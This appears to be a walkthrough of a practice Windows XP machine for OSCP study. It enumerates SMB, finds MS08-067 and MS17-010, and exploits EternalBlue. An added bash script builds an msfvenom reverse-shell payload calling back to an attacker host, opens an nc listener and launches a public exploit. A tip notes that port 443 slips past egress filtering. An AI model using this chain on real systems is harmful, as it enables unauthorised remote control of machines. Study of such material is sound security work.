In this writeup we’ll start with Sparta, a tool for automatic enumeration.
I usually run Sparta right after the first nmap scan, to gather more information very quickly. Sparta launches nmap and, once it finds a port matching a particular tool, runs that tool as well (for example Nikto on port 80 or 443).
As we can see, there are not many options apart from the SMB protocol.
The other important thing is that we discovered the target OS (Windows XP).
No shares seem to be available on the machine, and anonymous login is not allowed.
It’s time to go deeper into enumeration. Nmap ships many vuln NSE scripts that make the enumeration phase easier.
Locate the scripts with:
Let’s launch the vuln scripts against our target on port 445.
There are two BIG vulns. The first is MS08-067, an old vulnerability discovered in 2008. It is possible to exploit it with Metasploit (I don’t want to do this). For those studying for the OSCP it is good practice to avoid Metasploit, and it is not always easy to find out how to solve machines without that tool.
The other discovered vulnerability affects the SMBv1 server (MS17-010); it is the vuln that allowed the spread of the WannaCry ransomware in 2017.
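The full `--script vuln` output is long and most of it is noise, so here is an added example (not part of the original writeup) that filters it down to the scripts that reported `State: VULNERABLE` together with their CVE IDs. The nmap output embedded below is constructed to mirror the layout of the smb-vuln-* scripts against a Windows XP SP3 host; it is not a real capture, and the target address in the usage comment is a placeholder.

```bash
#!/usr/bin/env bash
# Added example, not from the original writeup: reduce "nmap --script vuln" output
# to the scripts that reported State: VULNERABLE, with their CVE IDs.
# Real usage (target address is a placeholder):
#   ls /usr/share/nmap/scripts/smb-vuln*          # the SMB vuln scripts on Kali
#   nmap -p445 --script vuln 192.0.2.20 | vulnerable_scripts

# Constructed sample, shaped like nmap's smb-vuln-* output for a Windows XP SP3 host
# (not a real capture). Single-line results are prefixed "|_", multi-line ones "| ".
NMAP_SAMPLE='Host script results:
| smb-vuln-ms08-067: 
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3 allows
|           remote attackers to execute arbitrary code via a crafted RPC request.
|     Disclosure date: 2008-10-23
|     References:
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|     Disclosure date: 2017-03-14
|     References:
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx'

# Reads nmap output on stdin, prints "<script-id> <CVE>" for each VULNERABLE result.
# A script block starts at a line like "| smb-vuln-xxx:" or "|_smb-vuln-xxx: ...";
# the block's "State:" and "IDs:" lines decide whether it is printed.
vulnerable_scripts() {
  awk '
    function flush() {
      if (id != "" && state == "VULNERABLE") printf "%s %s\n", id, cve
    }
    /^[|]_?[ ]*smb-vuln-[^:]+:/ {
      flush()
      line = $0
      sub(/^[|]_?[ ]*/, "", line)      # drop the "| " / "|_" prefix
      split(line, parts, ":")
      id = parts[1]; state = ""; cve = ""
    }
    /State: VULNERABLE/ { state = "VULNERABLE" }
    /IDs:/ {
      for (i = 1; i <= NF; i++)
        if ($i ~ /^CVE:/) cve = substr($i, 5)   # "CVE:CVE-2008-4250" -> "CVE-2008-4250"
    }
    END { flush() }
  '
}

printf '%s\n' "$NMAP_SAMPLE" | vulnerable_scripts
```

Run against the sample it prints only the two findings that matter here, `smb-vuln-ms08-067 CVE-2008-4250` and `smb-vuln-ms17-010 CVE-2017-0143`; `false` results, script errors and `State: NOT VULNERABLE` blocks are dropped.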
Let’s try to exploit this.
This page https://github.com/helviojunior/MS17-010 collects a lot of different exploits related to the EternalBlue (MS17-010) vulnerability.
This particular exploit was tested on XP.
The Python script asks for the target IP and an executable file: it sends the file to the victim and runs it there, so if we generate a malicious executable we get RCE.
Create the payload with msfvenom:
where X.X.X.X is the attacking machine address that will receive the reverse shell. Open a listener on port 443 and launch the command:
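The three steps above (payload, listener, exploit) are easy to get subtly wrong, so here is an added example, not code from the original writeup or from the MS17-010 repository, that wraps them with the checks a pentester wants before firing: a valid LHOST/RHOST, a sane LPORT, and, once built, a payload that really is a PE executable. It uses the unstaged `windows/shell_reverse_tcp` payload on purpose: a plain `nc` listener cannot serve the second stage that `windows/shell/reverse_tcp` would request. The addresses are TEST-NET placeholders standing in for X.X.X.X and the target, and `EXPLOIT` is a hypothetical file name for the XP exploit script from the repo (which, as the page says, takes the target IP and the executable).

```bash
#!/usr/bin/env bash
# Added example, not code from the original writeup or from the MS17-010 repository.
# Placeholders / assumptions: LHOST and RHOST are TEST-NET addresses standing in for
# X.X.X.X and the target; EXPLOIT is a hypothetical name for the XP exploit script
# from the repo, which takes the target IP and the executable as arguments.

LHOST=${LHOST:-192.0.2.10}       # attacking machine (placeholder for X.X.X.X)
LPORT=${LPORT:-443}
RHOST=${RHOST:-192.0.2.20}       # target (placeholder)
PAYLOAD=${PAYLOAD:-rev.exe}
EXPLOIT=${EXPLOIT:-./exploit.py} # placeholder name for the repo's XP exploit script

# Strict dotted-quad check: exactly four numeric octets, each 0-255.
valid_ipv4() {
  case $1 in ''|*[!0-9.]*) return 1 ;; esac
  ip=$1
  old_ifs=$IFS; IFS=.; set -- $ip; IFS=$old_ifs
  [ "$#" -eq 4 ] || return 1
  for o in "$@"; do
    [ -n "$o" ] && [ "$o" -le 255 ] || return 1
  done
}

valid_port() {
  case $1 in ''|*[!0-9]*) return 1 ;; esac
  [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# A Windows executable starts with the "MZ" DOS header; anything else (an empty
# file, an msfvenom error message redirected into the file by mistake) will not run.
is_pe() {
  [ -s "$1" ] && [ "$(dd if="$1" bs=2 count=1 2>/dev/null)" = "MZ" ]
}

# The msfvenom command line for a 32-bit (XP is x86) *unstaged* reverse shell,
# printed only after the values it embeds have been validated.
msfvenom_cmd() {
  valid_ipv4 "$1" || { echo "bad LHOST: $1" >&2; return 1; }
  valid_port "$2" || { echo "bad LPORT: $2" >&2; return 1; }
  printf 'msfvenom -p windows/shell_reverse_tcp LHOST=%s LPORT=%s -f exe -o %s\n' "$1" "$2" "$3"
}

# Print the three steps in the order they must happen (listener before exploit).
show_plan() {
  valid_ipv4 "$RHOST" || { echo "bad RHOST: $RHOST" >&2; return 1; }
  echo "# 1) build the payload on the attacking machine:"
  msfvenom_cmd "$LHOST" "$LPORT" "$PAYLOAD" || return 1
  echo "# 2) in a second terminal, open the listener before launching the exploit:"
  echo "nc -nlvp $LPORT"
  echo "# 3) send the executable to the target and run it:"
  echo "python $EXPLOIT $RHOST $PAYLOAD"
}

# Actually run msfvenom and refuse to continue if the output is not a PE file.
build_payload() {
  command -v msfvenom >/dev/null 2>&1 || { echo "msfvenom not installed" >&2; return 1; }
  valid_ipv4 "$LHOST" && valid_port "$LPORT" || return 1
  msfvenom -p windows/shell_reverse_tcp LHOST="$LHOST" LPORT="$LPORT" -f exe -o "$PAYLOAD" || return 1
  is_pe "$PAYLOAD" || { echo "$PAYLOAD is not a PE executable, not sending it" >&2; return 1; }
}

if [ "${1:-}" = "--build" ]; then build_payload; else show_plan; fi
```

Without arguments the script only prints the plan with the validated values filled in; `--build` runs msfvenom and checks the result. Keeping the listener on 443 is a deliberate choice: an outbound connection to 443 from the target looks like HTTPS and is rarely filtered on the way out.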
With systeminfo we can discover information about our target.
We are able to reach the Administrator\Desktop folder, so we already have administrator-level access on the machine (the Windows equivalent of root) and no privilege escalation is needed. Note that Windows XP does not ship the whoami command, so listing the Administrator’s folders is the quickest way to confirm the level of access.